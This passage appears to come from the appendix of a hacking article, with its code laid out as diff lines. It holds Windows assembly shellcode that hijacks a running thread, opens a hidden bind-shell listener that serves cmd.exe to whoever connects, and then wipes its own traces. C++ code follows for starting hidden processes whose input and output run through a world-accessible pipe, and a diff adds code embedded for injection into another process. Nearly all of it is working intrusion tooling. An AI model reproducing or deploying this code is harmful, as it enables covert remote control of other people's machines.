+local        @@delta
+call         $+5
+@@delta:
+sub          DWORD PTR [esp], OFFSET @@delta
+lea        reg, operand
+add        reg, DWORD PTR [esp]
+add        esp,4
+ENDM
+
+main proc
+Start:
+IFDEF DEBUG
+int        3
+ENDIF
+
+;Code for evaluating self address
+delta:
+pop          ebx
+sub        ebx,OFFSET delta
+;Allocate place for variables in stack
+enter        SizeOfLocals,0
+;Save difference between load address and ImageBase
+mov        FixupDelta,ebx
+
+;Tables, where to write addresses of exported functions
+KERNEL32FunctionsTable                EQU        _CreateThread
+NTDLLFunctionsTable                EQU        _ZwOpenThread
+WS2_32FunctionsTable                EQU        _WSASocket
+
+;Local variables
+local flag:DWORD,save_eip:DWORD,_CreateThread:DWORD,_GetThreadContext:DWORD,_SetThreadContext:DWORD,_ExitThread:DWORD,_LoadLibrary:DWORD,_CreateProcessA:DWORD,_Sleep:DWORD,_VirtualFree:DWORD,_ZwOpenThread:DWORD,_ZwAlertThread:DWORD,cxt:CONTEXT,clid:CLIENT_ID,hThread:DWORD,attr:OBJECT_ATTRIBUTES,addr:sockaddr_in,sizeofaddr:DWORD,sock:DWORD,sock2:DWORD,StartInf:STARTUPINFO,ProcInf:PROCESS_INFORMATION,_WSASocket:DWORD,_bind:DWORD,_listen:DWORD,_accept:DWORD,_WSAStartup:DWORD,_closesocket:DWORD,_WSACleanup:DWORD,wsadat:WSAdata,FixupDelta:DWORD =SizeOfLocals
+ assume fs : nothing
+ ;---- get ImageBase of kernel32.dll ----
+lea        ebx,KERNEL32FunctionsTable
+push        ebx
+laa        ebx,KERNEL32StringTable
+push        ebx
+ push        0FFFF0000h
+ call GetDllBaseAndLoadFunctions
+
+lea        ebx,NTDLLFunctionsTable
+push        ebx
+laa        ebx,NTDLLStringTable
+push        ebx
+ push        0FFFF0000h
+ call GetDllBaseAndLoadFunctions
+
+laa edi, CLID_here
+push edi
+assume edi:ptr OBJECT_ATTRIBUTES
+lea edi,attr
+cld
+mov        ecx,SIZE OBJECT_ATTRIBUTES
+xor        eax,eax
+rep stosb
+lea edi,attr
+mov[edi].Length,SIZE OBJECT_ATTRIBUTES
+push edi
+push  THREAD_ALL_ACCESS
+lea edi,hThread
+push        edi
+IFDEF DEBUG
+int        3
+ENDIF
+call _ZwOpenThread
+
+lea edi, cxt
+assume edi:ptr CONTEXT
+mov [edi].cx_ContextFlags,CONTEXT_FULL
+
+xor        ebx,ebx
+mov eax,hThread
+;there is a thread handle in EAX
+;push at once for call many following functions
+push edi        ; _SetThreadContext
+push eax
+;-)
+push eax        ; _ZwAlertThread
+;-)
+push edi        ; _SetThreadContext
+push eax
+;-)
+push edi        ; _GetThreadContext
+push eax
+call _GetThreadContext
+
+mov        eax,[edi].cx_Eip
+mov        save_eip,eax        
+laa         eax, new_thread
+mov         [edi].cx_Eip, eax
+
+;Self-modify code
+;Save EBP to copy current stack in each new thread
+laa         eax, ebp_value_here
+mov         [eax],ebp
+laa         eax, ebp1_value_here
+mov         [eax],ebp
+;Write addres of flag, that informs of "create main thread" completion
+laa         eax, flag_addr_here
+lea        ebx,flag
+mov        [eax],ebx
+mov        flag,0
+
+call _SetThreadContext
+;If thread in wait state, it will not run until it (wait) ends or alerted
+call _ZwAlertThread        
+;not works if wait is nonalertable
+
+;Wait for main thread creation
+check_flag:
+call        _Sleep,10
+cmp        flag,1
+jnz        check_flag
+
+;Restore EIP of interupted thread
+mov         eax, save_eip
+mov         [edi].cx_Eip, eax
+call _SetThreadContext
+
+push        0
+call _ExitThread
+
+; --- This code executes in interrupted thread and creates main thread ---
+new_thread:
+IFDEF DEBUG
+int 3
+ENDIF
+ebp1_value_here_2:
+mov        ebp,0
+lab_posle_ebp1_value:
+ORG ebp1_value_here_2+1
+ebp1_value_here:
+ORG lab_posle_ebp1_value-main
+xor           eax,eax
+push          eax
+push          eax
+push          eax
+laa          ebx, remote_shell
+push          ebx
+push          eax
+push          eax
+call _CreateThread
+;call        _Sleep,INFINITE
+jmp        $
+
+remote_shell:
+IFDEF DEBUG
+int 3
+ENDIF
+ebp_value_here_2:
+mov        esi,0
+lab_posle_ebp_value:
+ORG ebp_value_here_2+1
+ebp_value_here:
+ORG lab_posle_ebp_value-main
+mov         ecx,SizeOfLocals
+sub        esi,ecx
+mov        edi,esp
+sub        edi,ecx
+cld
+rep movsb
+mov        ebp,esp
+sub        esp,SizeOfLocals
+
+flag_addr_here_2:
+mov        eax,0
+lab_posle_flag_addr:
+ORG flag_addr_here_2+1
+flag_addr_here:
+ORG lab_posle_flag_addr-main
+mov        DWORD PTR [eax],1
+
+;Load WinSock
+laa        eax,szWSOCK32
+call _LoadLibrary,eax
+or   eax, eax
+jz   quit
+     
+ ;---- get ImageBase of ws2_32.dll ----
+;I'm deviator: load at first, then as if seek :)
+lea        ebx,WS2_32FunctionsTable
+push        ebx
+laa        ebx,WS2_32StringTable
+push        ebx
+push        eax
+call GetDllBaseAndLoadFunctions
+
+
+;--- telnet server
+lea        eax,wsadat
+push        eax
+push        0101h
+call        _WSAStartup
+
+xor        ebx,ebx
+;socket does not suit here!
+call        _WSASocket,AF_INET,SOCK_STREAM,IPPROTO_TCP,ebx,ebx,ebx
+mov        sock,eax
+
+mov        addr.sin_family,AF_INET
+mov        addr.sin_port,0088h
+mov        addr.sin_addr,INADDR_ANY
+
+;Look for unused port from 34816 and bind to it
+retry_bind:
+lea        ebx,addr
+call        _bind,sock,ebx,SIZE sockaddr_in
+IFDEF RETRY_BIND
+or           eax, eax
+jz           l_listen
+lea        edx,addr.sin_port+1
+inc        byte ptr[edx]
+cmp        byte ptr[edx],0
+;All ports busy...
+jz        quit        
+jmp        retry_bind
+ENDIF
+
+l_listen:
+call        _listen,sock,1
+or           eax, eax
+jnz           quit
+
+ShellCycle:
+
+mov        sizeofaddr,SIZE sockaddr_in
+lea        eax,sizeofaddr
+push        eax
+lea        eax, addr
+push        eax
+push        sock
+call        _accept
+mov         sock2, eax
+
+RunCmd:
+
+;int        3
+
+;Zero StartInf
+cld
+lea        edi,StartInf
+xor        eax,eax
+mov        ecx,SIZE STARTUPINFO
+rep        stosb
+;Fill StartInf. Shell will be bound to socket
+mov        StartInf.dwFlags,STARTF_USESTDHANDLES; OR STARTF_USESHOWWINDOW
+mov        eax, sock2
+mov        StartInf.hStdOutput,eax
+mov        StartInf.hStdError,eax
+mov        StartInf.hStdInput,eax
+mov        StartInf.cb,SIZE STARTUPINFO
+
+;Start shell
+xor        ebx,ebx
+lea        eax,ProcInf
+push        eax
+lea        eax,StartInf
+push        eax
+push        ebx
+push        ebx
+push        CREATE_NO_WINDOW
+push        1
+push        ebx
+push        ebx
+laa        eax,CmdLine
+push        eax
+push        ebx
+call        _CreateProcessA
+
+;To avoid hanging sessions
+call         _closesocket,sock2
+
+IFDEF MULTIPLE_CONNECT
+jmp        ShellCycle
+ENDIF
+
+quit:
+call        _closesocket,sock
+call        _WSACleanup
+;Sweep traces: free memory with that code and terminate thread
+;Code must not free stack because ExitThread address is there
+;It may wipe (zero out) stack in future versions
+push        MEM_RELEASE
+xor        ebx,ebx
+push        ebx
+push        OFFSET Start
+push        ebx
+push        _ExitThread
+jmp        _VirtualFree
+main endp
+
+; ------ ROUTINES ------
+
+; returns NULL in the case of an error
+GetDllBaseAndLoadFunctions proc uses edi esi, dwSearchStartAddr:DWORD, FuncNamesTable:DWORD, FuncPtrsTable:DWORD
+;----------------------------------------------
+local SEH:sSEH, FuncNameEnd:DWORD,dwDllBase:DWORD,PEHeader:DWORD
+ ; install SEH frame
+ laaa        eax, KernelSearchSehHandler
+ push        eax
+ push fs:dword ptr[0]
+ mov  SEH.OrgEsp, esp
+ laaa        eax, ExceptCont
+ mov  SEH.SaveEip, eax
+ mov  fs:dword ptr[0], esp
+
+ ; start the search
+ mov  edi, dwSearchStartAddr
+ .while TRUE
+    .if word ptr [edi] == IMAGE_DOS_SIGNATURE
+       mov  esi, edi
+       add  esi, [esi+03Ch]
+       .if  dword ptr [esi] == IMAGE_NT_SIGNATURE
+          .break
+       .endif
+    .endif
+           ExceptCont:
+    sub  edi, 010000h
+ .endw
+ mov        dwDllBase,edi
+ mov        PEHeader,esi
+
+LoadFunctions:
+ ; get the string length of the target Api
+ mov  edi, FuncNamesTable
+ mov  ecx, MAX_API_STRING_LENGTH
+ xor  al, al
+ repnz  scasb
+ mov        FuncNameEnd,edi
+ mov  ecx, edi
+ sub  ecx, FuncNamesTable       ; ECX -> Api string length
+
+ ; trace the export table
+ mov  edx, [esi+078h]      ; EDX -> Export table
+ add  edx, dwDllBase
+ assume edx:ptr IMAGE_EXPORT_DIRECTORY
+ mov  ebx, [edx].AddressOfNames     ; EBX -> AddressOfNames array pointer
+ add  ebx, dwDllBase
+ xor  eax, eax       ; eax AddressOfNames Index
+ .repeat
+    mov  edi, [ebx]
+    add  edi, dwDllBase
+    mov  esi, FuncNamesTable
+    push ecx    ; save the api string length
+    repz cmpsb
+    .if zero?
+       add  esp, 4
+       .break
+    .endif
+    pop  ecx
+    add  ebx, 4
+    inc  eax
+ .until eax == [edx].NumberOfNames
+
+ ; did we found sth ?
+ .if eax == [edx].NumberOfNames
+    jmp ExceptContinue
+ .endif
+
+ ; find the corresponding Ordinal
+ mov  esi, [edx].AddressOfNameOrdinals
+ add  esi, dwDllBase
+ shl  eax, 1
+ add  eax, esi
+ movzx        eax,word ptr [eax]
+
+ ; get the address of the api
+ mov  edi, [edx].AddressOfFunctions
+ shl  eax, 2
+ add  eax, dwDllBase
+ add  eax, edi
+ mov  eax, [eax]
+ add  eax, dwDllBase
+ 
+ mov        ecx,FuncNameEnd
+ mov        FuncNamesTable,ecx
+ mov        ebx,FuncPtrsTable
+ mov        DWORD PTR [ebx],eax
+ mov        esi,PEHeader
+ cmp        BYTE PTR [ecx],0
+ jnz          LoadFunctions
+
+Quit:
+ ; shutdown seh frame
+ pop  fs:dword ptr[0]
+ add  esp, 4
+ ret
+ ExceptContinue:
+ mov         edi, dwDllBase
+ jmp ExceptCont
+GetDllBaseAndLoadFunctions endp
+
+KernelSearchSehHandler PROC C pExcept:DWORD,pFrame:DWORD,pContext:DWORD,pDispatch:DWORD
+ mov  eax, pContext
+ assume eax:ptr CONTEXT
+ sub  dword ptr [eax].cx_Edi,010000h
+ mov  eax, 0        ;ExceptionContinueExecution
+ ret
+KernelSearchSehHandler ENDP
+
+KERNEL32StringTable:
+szCreateThread          db "CreateThread",0
+szGetThreadContext        db "GetThreadContext",0
+szSetThreadContext         db "SetThreadContext",0
+szExitThread                db "ExitThread",0
+szLoadLibrary           db "LoadLibraryA",0
+szCreateProcessA        db "CreateProcessA",0
+szSleep                        db "Sleep",0
+szVirtualFree                db "VirtualFree",0
+db                        0
+
+szWSOCK32                db "WS2_32.DLL",0
+WS2_32StringTable:
+szsocket                db "WSASocketA",0
+szbind                        db "bind",0
+szlisten                db "listen",0
+szaccept                db "accept",0
+szWSAStartup                db "WSAStartup",0
+szclosesocket                db "closesocket",0
+szWSACleanup                db "WSACleanup",0
+db                        0
+
+NTDLLStringTable:
+szZwOpenThread                db "ZwOpenThread",0
+szZwAlertThread                db "ZwAlertThread",0
+db                        0
+
+CmdLine                        db        "cmd.exe",0
+
+ALIGN        4
+CLID_here                CLIENT_ID <0>
+
+;----------------------------------------------
+
+EndFile:
+
+end Start
+
+
+----[ 8.4 - NebbetCreateProcess.cpp
+
+#include <ntdll.h>
+#include "DynLoadFromNtdll.h"
+#include "NtdllDynamicLoader.h"
+extern "C" {
+#include "SECSYS.H"
+}
+
+namespace NT {
+
+typedef struct _CSRSS_MESSAGE{
+        ULONG        Unknwon1;
+        ULONG        Opcode;
+        ULONG        Status;
+        ULONG        Unknwon2;
+}CSRSS_MESSAGE,*PCSRSS_MESSAGE;
+
+}
+
+DYNAMIC_LOAD1(CsrClientCallServer)
+DYNAMIC_LOAD1(RtlDestroyProcessParameters)
+DYNAMIC_LOAD1(ZwWriteVirtualMemory)
+DYNAMIC_LOAD1(ZwResumeThread)
+DYNAMIC_LOAD1(ZwCreateThread)
+DYNAMIC_LOAD1(ZwProtectVirtualMemory)
+DYNAMIC_LOAD1(ZwCreateProcess)
+DYNAMIC_LOAD1(ZwRequestWaitReplyPort)
+DYNAMIC_LOAD1(ZwReadVirtualMemory)
+DYNAMIC_LOAD1(ZwCreateNamedPipeFile)
+DYNAMIC_LOAD1(LdrGetDllHandle)
+
+//Dynamic import of functions exported from ntdll.dll
+extern "C" void LoadFuncs()
+{
+        static PVOID pNTDLL;
+        if (!pNTDLL)
+        {
+                pNTDLL=FindNT();        
+                DYNAMIC_LOAD2(CsrClientCallServer)
+                DYNAMIC_LOAD2(RtlDestroyProcessParameters)
+                DYNAMIC_LOAD2(ZwWriteVirtualMemory)
+                DYNAMIC_LOAD2(ZwResumeThread)
+                DYNAMIC_LOAD2(ZwCreateThread)
+                DYNAMIC_LOAD2(ZwProtectVirtualMemory)
+                DYNAMIC_LOAD2(ZwCreateProcess)
+                DYNAMIC_LOAD2(ZwRequestWaitReplyPort)
+                DYNAMIC_LOAD2(ZwReadVirtualMemory)
+                DYNAMIC_LOAD2(ZwCreateNamedPipeFile)
+                DYNAMIC_LOAD2(LdrGetDllHandle)
+        }
+}
+
+//Informs CSRSS about new win32-process
+VOID InformCsrss(HANDLE hProcess, HANDLE hThread, ULONG pid, ULONG tid)
+{
+//        _asm int 3;
+    struct CSRSS_MESSAGE {
+        ULONG Unknown1;
+        ULONG Opcode;
+        ULONG Status;
+        ULONG Unknown2;
+    };
+
+    struct {
+                NT::PORT_MESSAGE PortMessage;
+        CSRSS_MESSAGE CsrssMessage;
+        PROCESS_INFORMATION ProcessInformation;
+        NT::CLIENT_ID Debugger;
+        ULONG CreationFlags;
+        ULONG VdmInfo[2];
+    } csrmsg = {{0}, {0}, {hProcess, hThread, pid, tid}, {0}, 0/*STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW*/, {0}};
+
+    CsrClientCallServer(&csrmsg, 0, 0x10000, 0x24);
+}
+
+//Initialse empty environment
+PWSTR InitEnvironment(HANDLE hProcess)
+{
+    PVOID p=0;
+    DWORD dummy=0;
+        DWORD n=sizeof(dummy);
+        DWORD m;
+        m=n;
+        NT::ZwAllocateVirtualMemory(hProcess, &p, 0, &m,
+                                MEM_COMMIT, PAGE_READWRITE);
+    ZwWriteVirtualMemory(hProcess, p, &dummy, n, 0);
+    return PWSTR(p);
+}
+
+// Clone of Ntdll::RtlCreateProcessParameters...
+VOID RtlCreateProcessParameters(NT::PPROCESS_PARAMETERS* pp,
+                                                                NT::PUNICODE_STRING        ImageFile,
+                                                                NT::PUNICODE_STRING        DllPath,
+                                                                NT::PUNICODE_STRING        CurrentDirectory,
+                                                                NT::PUNICODE_STRING        CommandLine,
+                                                                ULONG        CreationFlag,
+                                                                NT::PUNICODE_STRING        WindowTitle,
+                                                                NT::PUNICODE_STRING        Desktop,
+                                                                NT::PUNICODE_STRING        Reserved,
+                                                                NT::PUNICODE_STRING        Reserved2){
+
+        NT::PROCESS_PARAMETERS*        lpp;
+
+        ULONG        Size=sizeof(NT::PROCESS_PARAMETERS);
+        if(ImageFile) Size+=ImageFile->MaximumLength;
+        if(DllPath) Size+=DllPath->MaximumLength;
+        if(CurrentDirectory) Size+=CurrentDirectory->MaximumLength;
+        if(CommandLine) Size+=CommandLine->MaximumLength;
+        if(WindowTitle) Size+=WindowTitle->MaximumLength;
+        if(Desktop) Size+=Desktop->MaximumLength;
+        if(Reserved) Size+=Reserved->MaximumLength;
+        if(Reserved2) Size+=Reserved2->MaximumLength;
+
+        //Allocate the buffer..
+        *pp=(NT::PPROCESS_PARAMETERS)NT::ExAllocatePool(NT::NonPagedPool,Size);
+        lpp=*pp;
+        RtlZeroMemory(lpp,Size);
+
+        lpp->AllocationSize=PAGE_SIZE;
+        lpp->Size=sizeof(NT::PROCESS_PARAMETERS); // Unicode size will be added (if any)
+        lpp->hStdInput=0;
+        lpp->hStdOutput=0;
+        lpp->hStdError=0;
+        if(CurrentDirectory){
+                lpp->CurrentDirectoryName.Length=CurrentDirectory->Length;
+                lpp->CurrentDirectoryName.MaximumLength=CurrentDirectory->MaximumLength;
+                RtlCopyMemory((PCHAR)(lpp)+lpp->Size,CurrentDirectory->Buffer,CurrentDirectory->Length);
+                lpp->CurrentDirectoryName.Buffer=(PWCHAR)lpp->Size;
+                lpp->Size+=CurrentDirectory->MaximumLength;
+        }
+        if(DllPath){
+                lpp->DllPath.Length=DllPath->Length;
+                lpp->DllPath.MaximumLength=DllPath->MaximumLength;
+                RtlCopyMemory((PCHAR)(lpp)+lpp->Size,DllPath->Buffer,DllPath->Length);
+                lpp->DllPath.Buffer=(PWCHAR)lpp->Size;
+                lpp->Size+=DllPath->MaximumLength;
+        }
+        if(ImageFile){
+                lpp->ImageFile.Length=ImageFile->Length;
+                lpp->ImageFile.MaximumLength=ImageFile->MaximumLength;
+                RtlCopyMemory((PCHAR)(lpp)+lpp->Size,ImageFile->Buffer,ImageFile->Length);
+                lpp->ImageFile.Buffer=(PWCHAR)lpp->Size;
+                lpp->Size+=ImageFile->MaximumLength;
+        }
+        if(CommandLine){
+                lpp->CommandLine.Length=CommandLine->Length;
+                lpp->CommandLine.MaximumLength=CommandLine->MaximumLength;
+                RtlCopyMemory((PCHAR)(lpp)+lpp->Size,CommandLine->Buffer,CommandLine->Length);
+                lpp->CommandLine.Buffer=(PWCHAR)lpp->Size;
+                lpp->Size+=CommandLine->MaximumLength;
+        }
+        if(WindowTitle){
+                lpp->WindowTitle.Length=WindowTitle->Length;
+                lpp->WindowTitle.MaximumLength=WindowTitle->MaximumLength;
+                RtlCopyMemory((PCHAR)(lpp)+lpp->Size,WindowTitle->Buffer,WindowTitle->Length);
+                lpp->WindowTitle.Buffer=(PWCHAR)lpp->Size;
+                lpp->Size+=WindowTitle->MaximumLength;
+        }
+        if(Desktop){
+                lpp->Desktop.Length=Desktop->Length;
+                lpp->Desktop.MaximumLength=Desktop->MaximumLength;
+                RtlCopyMemory((PCHAR)(lpp)+lpp->Size,Desktop->Buffer,Desktop->Length);
+                lpp->Desktop.Buffer=(PWCHAR)lpp->Size;
+                lpp->Size+=Desktop->MaximumLength;
+        }
+        if(Reserved){
+                lpp->Reserved2.Length=Reserved->Length;
+                lpp->Reserved2.MaximumLength=Reserved->MaximumLength;
+                RtlCopyMemory((PCHAR)(lpp)+lpp->Size,Reserved->Buffer,Reserved->Length);
+                lpp->Reserved2.Buffer=(PWCHAR)lpp->Size;
+                lpp->Size+=Reserved->MaximumLength;
+        }
+/*        if(Reserved2){
+                lpp->Reserved3.Length=Reserved2->Length;
+                lpp->Reserved3.MaximumLength=Reserved2->MaximumLength;
+                RtlCopyMemory((PCHAR)(lpp)+lpp->Size,Reserved2->Buffer,Reserved2->Length);
+                lpp->Reserved3.Buffer=(PWCHAR)lpp->Size;
+                lpp->Size+=Reserved2->MaximumLength;
+        }*/
+}
+
+VOID CreateProcessParameters(HANDLE hProcess, NT::PPEB Peb,
+                             NT::PUNICODE_STRING ImageFile, HANDLE hPipe)
+{
+    NT::PPROCESS_PARAMETERS pp;
+        NT::UNICODE_STRING                CurrentDirectory;                                
+        NT::UNICODE_STRING                DllPath;                                
+
+        NT::RtlInitUnicodeString(&CurrentDirectory,L"C:\\WINNT\\SYSTEM32\\");
+        NT::RtlInitUnicodeString(&DllPath,L"C:\\;C:\\WINNT\\;C:\\WINNT\\SYSTEM32\\");
+        
+
+
+    RtlCreateProcessParameters(&pp, ImageFile, &DllPath,&CurrentDirectory, ImageFile, 0, 0, 0, 0, 0);
+        
+        pp->hStdInput=hPipe;
+    pp->hStdOutput=hPipe;//hStdOutPipe;
+    pp->hStdError=hPipe;//hStdOutPipe;
+        pp->dwFlags=STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
+        pp->wShowWindow=SW_HIDE;//CREATE_NO_WINDOW;
+
+    pp->Environment = InitEnvironment(hProcess);
+        
+    ULONG n = pp->Size;
+    PVOID p = 0;
+    NT::ZwAllocateVirtualMemory(hProcess, &p, 0, &n,
+                                MEM_COMMIT, PAGE_READWRITE);
+
+    ZwWriteVirtualMemory(hProcess, p, pp, pp->Size, 0);
+
+    ZwWriteVirtualMemory(hProcess, PCHAR(Peb) + 0x10, &p, sizeof p, 0);
+
+    RtlDestroyProcessParameters(pp);
+}
+
+namespace NT {
+extern "C" {
+DWORD WINAPI RtlCreateAcl(PACL acl,DWORD size,DWORD rev);
+BOOL      WINAPI RtlAddAccessAllowedAce(PACL,DWORD,DWORD,PSID);
+}}
+
+NTSTATUS BuildAlowingSD(PSECURITY_DESCRIPTOR *pSecurityDescriptor)
+{
+        //_asm int 3;
+        SID SeWorldSid={SID_REVISION, 1, SECURITY_WORLD_SID_AUTHORITY, SECURITY_WORLD_RID};
+        SID localSid={SID_REVISION, 1, SECURITY_NT_AUTHORITY, SECURITY_LOCAL_SYSTEM_RID};
+        char daclbuf[PAGE_SIZE];
+        NT::PACL dacl = (NT::PACL)&daclbuf;
+        char sdbuf[PAGE_SIZE];
+        NT::PSECURITY_DESCRIPTOR sd = &sdbuf;
+        
+        NTSTATUS status = NT::RtlCreateAcl(dacl, PAGE_SIZE, ACL_REVISION);
+    if (!NT_SUCCESS(status)) return status;
+    status = NT::RtlAddAccessAllowedAce(dacl, ACL_REVISION, FILE_ALL_ACCESS, &SeWorldSid);
+    if (!NT_SUCCESS(status)) return status;
+    RtlZeroMemory(sd, PAGE_SIZE);
+    status = NT::RtlCreateSecurityDescriptor(sd, SECURITY_DESCRIPTOR_REVISION);
+    if (!NT_SUCCESS(status)) return status;
+    status = RtlSetOwnerSecurityDescriptor(sd, &localSid, FALSE);
+    if (!NT_SUCCESS(status)) return status;
+    status = NT::RtlSetDaclSecurityDescriptor(sd, TRUE, dacl, FALSE);
+    if (!NT_SUCCESS(status)) return status;
+    if (!NT::RtlValidSecurityDescriptor(sd)) {
+        _asm int 3;
+    }
+        
+        //To try!
+        ULONG buflen = PAGE_SIZE*2;
+        *pSecurityDescriptor = NT::ExAllocatePool(NT::PagedPool, buflen);
+    if (!*pSecurityDescriptor) return STATUS_INSUFFICIENT_RESOURCES;
+        return RtlAbsoluteToSelfRelativeSD(sd, *pSecurityDescriptor, &buflen);
+}
+
+#define PIPE_NAME_MAX 40*2
+
+extern "C" NTSTATUS myCreatePipe1(PHANDLE phPipe, NT::PUNICODE_STRING PipeName, IN ACCESS_MASK DesiredAccess, PSECURITY_DESCRIPTOR sd, ULONG ShareAccess)
+{
+        NT::IO_STATUS_BLOCK                iosb;
+        
+        NT::OBJECT_ATTRIBUTES attr = {sizeof attr, 0, PipeName, OBJ_INHERIT, sd};
+        NT::LARGE_INTEGER nTimeOut;
+        nTimeOut.QuadPart = (__int64)-1E7;
+        return ZwCreateNamedPipeFile(phPipe, DesiredAccess | SYNCHRONIZE | FILE_ATTRIBUTE_TEMPORARY, &attr, &iosb, ShareAccess,
+                FILE_CREATE, 0, FALSE, FALSE, FALSE, 1, 0x1000, 0x1000, &nTimeOut);        
+}
+
+int exec_piped(NT::PUNICODE_STRING name, NT::PUNICODE_STRING PipeName)
+{
+    HANDLE hProcess, hThread, hSection, hFile;
+        
+        //_asm int 3;
+
+    NT::OBJECT_ATTRIBUTES oa = {sizeof oa, 0, name, OBJ_CASE_INSENSITIVE};
+    NT::IO_STATUS_BLOCK iosb;
+    NT::ZwOpenFile(&hFile, FILE_EXECUTE | SYNCHRONIZE, &oa, &iosb,
+                   FILE_SHARE_READ, FILE_SYNCHRONOUS_IO_NONALERT);
+
+    oa.ObjectName = 0;
+        
+    NT::ZwCreateSection(&hSection, SECTION_ALL_ACCESS, &oa, 0,
+                        PAGE_EXECUTE, SEC_IMAGE, hFile);
+
+    NT::ZwClose(hFile);
+
+        ZwCreateProcess(&hProcess, PROCESS_ALL_ACCESS, &oa,
+                        NtCurrentProcess(), TRUE, hSection, 0, 0);
+        
+    NT::SECTION_IMAGE_INFORMATION sii;
+    NT::ZwQuerySection(hSection, NT::SectionImageInformation,
+                       &sii, sizeof sii, 0);
+
+    NT::ZwClose(hSection);
+
+    NT::USER_STACK stack = {0};
+
+    ULONG n = sii.StackReserve;
+    NT::ZwAllocateVirtualMemory(hProcess, &stack.ExpandableStackBottom, 0, &n,
+                                MEM_RESERVE, PAGE_READWRITE);
+
+    stack.ExpandableStackBase = PCHAR(stack.ExpandableStackBottom)
+                              + sii.StackReserve;
+    stack.ExpandableStackLimit = PCHAR(stack.ExpandableStackBase)
+                               - sii.StackCommit;
+
+        /* PAGE_EXECUTE_READWRITE is needed if initialisation code will be executed on stack*/
+        n = sii.StackCommit + PAGE_SIZE;
+    PVOID p = PCHAR(stack.ExpandableStackBase) - n;
+    NT::ZwAllocateVirtualMemory(hProcess, &p, 0, &n,
+                                MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+
+    ULONG x; n = PAGE_SIZE;
+    ZwProtectVirtualMemory(hProcess, &p, &n,
+                               PAGE_READWRITE | PAGE_GUARD, &x);
+
+    NT::CONTEXT context = {CONTEXT_FULL};
+    context.SegGs = 0;
+    context.SegFs = 0x38;
+    context.SegEs = 0x20;
+    context.SegDs = 0x20;
+    context.SegSs = 0x20;
+    context.SegCs = 0x18;
+    context.EFlags = 0x3000;
+    context.Esp = ULONG(stack.ExpandableStackBase) - 4;
+    context.Eip = ULONG(sii.EntryPoint);
+
+    NT::CLIENT_ID cid;
+
+    ZwCreateThread(&hThread, THREAD_ALL_ACCESS, &oa,
+                       hProcess, &cid, &context, &stack, TRUE);
+
+    NT::PROCESS_BASIC_INFORMATION pbi;
+    NT::ZwQueryInformationProcess(hProcess, NT::ProcessBasicInformation,
+                                  &pbi, sizeof pbi, 0);
+        
+        HANDLE hPipe,hPipe1;
+        oa.ObjectName = PipeName;
+        oa.Attributes = OBJ_INHERIT;
+        if(NT::ZwOpenFile(&hPipe1, GENERIC_READ | GENERIC_WRITE | SYNCHRONIZE, &oa, &iosb, FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE)) return 0;
+        NT::ZwDuplicateObject(NtCurrentProcess(), hPipe1, hProcess, &hPipe,
+                0, 0, DUPLICATE_SAME_ACCESS | DUPLICATE_CLOSE_SOURCE);
+        
+        CreateProcessParameters(hProcess, pbi.PebBaseAddress, name, hPipe);
+
+    InformCsrss(hProcess, hThread,
+                ULONG(cid.UniqueProcess), ULONG(cid.UniqueThread));
+        
+    ZwResumeThread(hThread, 0);
+
+    NT::ZwClose(hProcess);
+    NT::ZwClose(hThread);
+
+    return int(cid.UniqueProcess);
+}
+
+int execute_piped(VOID *ImageFileName, NT::PUNICODE_STRING PipeName)
+{
+    NT::UNICODE_STRING ImageFile;
+    NT::RtlInitUnicodeString(&ImageFile, (wchar_t *)ImageFileName);
+    return exec_piped(&ImageFile, PipeName);
+}
+
+
+----[ 8.5 - NebbetCreateProcess.diff
+
+268a269,384
+> typedef
+> WINBASEAPI
+> BOOL
+> (WINAPI
+> *f_SetStdHandle)(
+>     IN DWORD nStdHandle,
+>     IN HANDLE hHandle
+>     );
+> typedef
+> WINBASEAPI
+> HANDLE
+> (WINAPI
+> *f_CreateFileW)(
+>     IN LPCWSTR lpFileName,
+>     IN DWORD dwDesiredAccess,
+>     IN DWORD dwShareMode,
+>     IN LPSECURITY_ATTRIBUTES lpSecurityAttributes,
+>     IN DWORD dwCreationDisposition,
+>     IN DWORD dwFlagsAndAttributes,
+>     IN HANDLE hTemplateFile
+>     );
+> #ifdef _DEBUG
+> typedef
+> WINBASEAPI
+> DWORD
+> (WINAPI
+> *f_GetLastError)(
+>     VOID
+>     );
+> #endif
+> typedef VOID (*f_EntryPoint)(VOID);
+>
+> struct s_data2embed
+> {
+>         wchar_t PipeName[PIPE_NAME_MAX];
+>         //wchar_t RPipeName[PIPE_NAME_MAX], WPipeName[PIPE_NAME_MAX];
+>         f_SetStdHandle pSetStdHandle;
+>         f_CreateFileW pCreateFileW;
+>         f_EntryPoint EntryPoint;
+> #ifdef _DEBUG
+>         f_GetLastError pGetLastError;
+> #endif
+> };
+>
+> //void before_code2embed(){};
+> void code2embed(s_data2embed *embedded_data)
+> {
+>         HANDLE hPipe;
+>
+>         __asm int 3;
+>         hPipe = embedded_data->pCreateFileW(embedded_data->PipeName,
+>                 GENERIC_READ | GENERIC_WRITE | SYNCHRONIZE,
+>                 0/*FILE_SHARE_READ | FILE_SHARE_WRITE*/,
+>                 NULL,
+>                 OPEN_EXISTING,
+>                 0/*FILE_ATTRIBUTE_NORMAL*/,
+>                 NULL);
+>         embedded_data->pGetLastError();
+>         /*//if (hRPipe==INVALID_HANDLE_VALUE) goto cont;
+>         hWPipe = embedded_data->pCreateFileW(embedded_data->WPipeName,
+>                 GENERIC_WRITE | SYNCHRONIZE,
+>                 FILE_SHARE_READ /*| FILE_SHARE_WRITE*,
+>                 NULL,
+>                 OPEN_EXISTING,
+>                 0,
+>                 NULL);
+>         embedded_data->pGetLastError();
+>         if ((hRPipe!=INVALID_HANDLE_VALUE)&&(hWPipe!=INVALID_HANDLE_VALUE)) */
+>         if (hPipe!=INVALID_HANDLE_VALUE)
+>         {
+>                 embedded_data->pSetStdHandle(STD_INPUT_HANDLE, hPipe);
+>                 embedded_data->pSetStdHandle(STD_OUTPUT_HANDLE, hPipe);
+>                 embedded_data->pSetStdHandle(STD_ERROR_HANDLE, hPipe);
+>         }
+>         embedded_data->EntryPoint();
+> }
+> __declspec(naked) void after_code2embed(){};
+> #define sizeof_code2embed ((ULONG)&after_code2embed-(ULONG)&code2embed)
+>
